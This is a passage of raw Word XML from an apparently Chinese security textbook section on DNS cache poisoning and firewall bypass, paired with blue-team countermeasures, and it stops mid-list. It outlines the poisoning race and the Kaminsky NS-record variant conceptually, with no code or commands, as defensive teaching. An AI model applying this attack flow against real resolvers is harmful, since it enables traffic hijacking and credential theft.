        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide》中“网络配置测试”一节涉及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的安全核查思路，可作为审计参考</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="132" w:name="dns-投毒防火墙绕过概念蓝队对照习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投毒、防火墙绕过概念·蓝队对照·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在完成对二层交换安全（VLAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击）的分析后，本节将关注点转向网络层与应用层，聚焦两种经典攻击概念——DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒与防火墙绕过——以及对应的纵深防御策略。DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议本身的无认证特性，通过伪造应答污染递归解析器缓存，将域名指向攻击者控制的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP；防火墙绕过则利用协议分片、隧道封装等方式，在看似合法的流量中携带恶意载荷或穿透边界访问管控。两者均属于攻击者在杀伤链早期进行“命令与控制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">横向移动准备”的典型手段，且都可在不直接接触目标主机的情况下实现。本节以概念剖析与防御对照为主，不提供可武器化的实现细节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与实验隔离声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节涉及的所有攻击概念——DNS缓存投毒、防火墙绕过——仅用于理解其原理以便构建有效防御。任何实际操作必须在以下环境中进行：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自建的、与生产网络及公网完全隔离的实验室；官方授权的靶机（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HackTheBox、TryHackMe、VulnHub、OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">镜像）；或已获得书面授权的目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。在本节中不会出现任何可直接用于攻击真实系统的完整工具命令或武器化策略。读者在学习防御技术时，同样必须在授权范围内对防护方案进行测试，不得在生产环境中未经审批修改配置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖与技术背景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：读者应已熟悉</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询/应答的基本交互过程（参阅《从位到物联》第26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS/IP/路由原理）、防火墙的基本过滤模式与状态检测（同书第28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙/ACL）、以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗在网络层攻击中的角色（本书第6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）。本节将在这些基础上，从假设违反的角度分析攻防。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="132"/>
    <w:bookmarkStart w:id="133" w:name="攻击者视角与防御者视角"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角与防御者视角</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者试图通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒将受害者对合法域名的请求重定向到恶意服务器，从而实现凭据窃取、恶意软件下发或会话劫持；而防御者则需要在递归解析器上强化源随机化、部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DNSSEC，并在网络边界监控异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量。对于防火墙绕过，攻击者可能尝试利用分片重组缺陷或使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS/HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隧道穿透出站策略，以达到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通信或数据外传的目的；防御者则应采用默认拒绝策略、状态检测、出站控制并结合应用层检测识别隧道行为。两种攻击的共同点是都违反了“协议应提供数据完整性及身份验证”这一安全假设——DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原本设计并未包含应答认证，传统无状态包过滤器也难以防止碎片化绕过。这与二层攻击中依赖默认信任的情形一脉相承，只是攻击面移至更高的协议栈。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkStart w:id="134" w:name="dns-缓存投毒原理概念示意③"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒原理（概念示意③）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒的核心假设是：递归解析器在接收到一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询后，会缓存第一个看起来“匹配”的应答，而不验证该应答是否真的来自权威服务器。攻击者可利用这一窗口向解析器发送大量伪造的响应包，试图抢在真实权威应答之前被解析器接受。一个典型的攻击流程如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者向受害者递归解析器发送一个域名的查询请求（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.example.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。解析器将此查询转发给上游的权威服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与此同时，攻击者向同一解析器连续发送大量伪造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应包，声称</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.example.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址为攻击者控制的恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若解析器未采用足够的随机化（源端口、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID、查询附加随机数），攻击者的伪造响应有很大概率恰好匹配待决查询的事务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和源端口，从而被接受并缓存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成功后，解析器将此错误记录返回给所有后续请求该域名的客户端，域名指向被攻击者劫持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这种“抢答”攻击的变种之一是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dan Kaminsky </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2008 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">年演示的缓存投毒技巧，其关键点在于攻击者并非针对某个特定域名，而是通过向解析器查询随机子域名（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rand123.example.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），伪造附加权威区段的响应，将整个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">example.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录替换为攻击者控制的域名服务器。这使攻击者几乎能控制与该域相关的所有查询，危害极大。该方法的本质是滥用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议的“额外资源记录（additional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">records）”，在响应中同时提供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，从而扩大污染范围。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从协议层面分析，DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒依赖于以下薄弱假设：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对端无认证：DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应包中没有携带任何可验证的签名或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC，仅靠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位的事务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP/端口关联请求与响应。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源端口可预测或范围过小：在早期的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BIND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等实现中，源端口在选择时随机性不足，使攻击者有可能在有限空间内命中。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析器缓存时未执行严格范围检查：例如盲目接受</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> additional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区段中任何记录，即使与原本查询的域名无关。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尽管主流解析器已通过源端口随机化（RFC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5452）、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随机化和查询随机化（0x20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码、随机大小写）等手段大幅提高攻击难度，但在某些环境下——例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备限制源端口选择、递归器使用回环</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单一地址——攻击者仍可能找到侧信道绕过这些补丁。相关研究中展示的针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境端口复用、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分片重组的投毒方法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">大多要求攻击者在网络路径上或具备侧信道观测能力，已非纯粹的远程盲打，但依然提醒我们：仅靠随机化不足以提供实际安全，必须结合端到端的密码学验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒的蓝队应对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DNSSEC（域名系统安全扩展）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过数字签名对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据进行链式验证，保证从根区到目标域名的每一级应答均可验证其来源与完整性。当解析器验证签名失败时，返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVFAIL，而不缓存恶意记录。DNSSEC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是根本上消除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗的最佳方案，但需关注其部署率和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KeyTrap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DoS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击的缓解。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">严格的源端口与查询随机化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：确保递归解析器使用足够大的源端口范围（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">net.ipv4.ip_local_port_range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）并支持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0x20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随机化等方案，使伪造响应命中概率降至可接受水平。NAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备需保持端口的充分随机性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">限制额外区段信任</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：解析器应仅接受与原始查询直接相关的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> additional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，并拒绝未经请求的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，避免被利用扩大污染范围。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
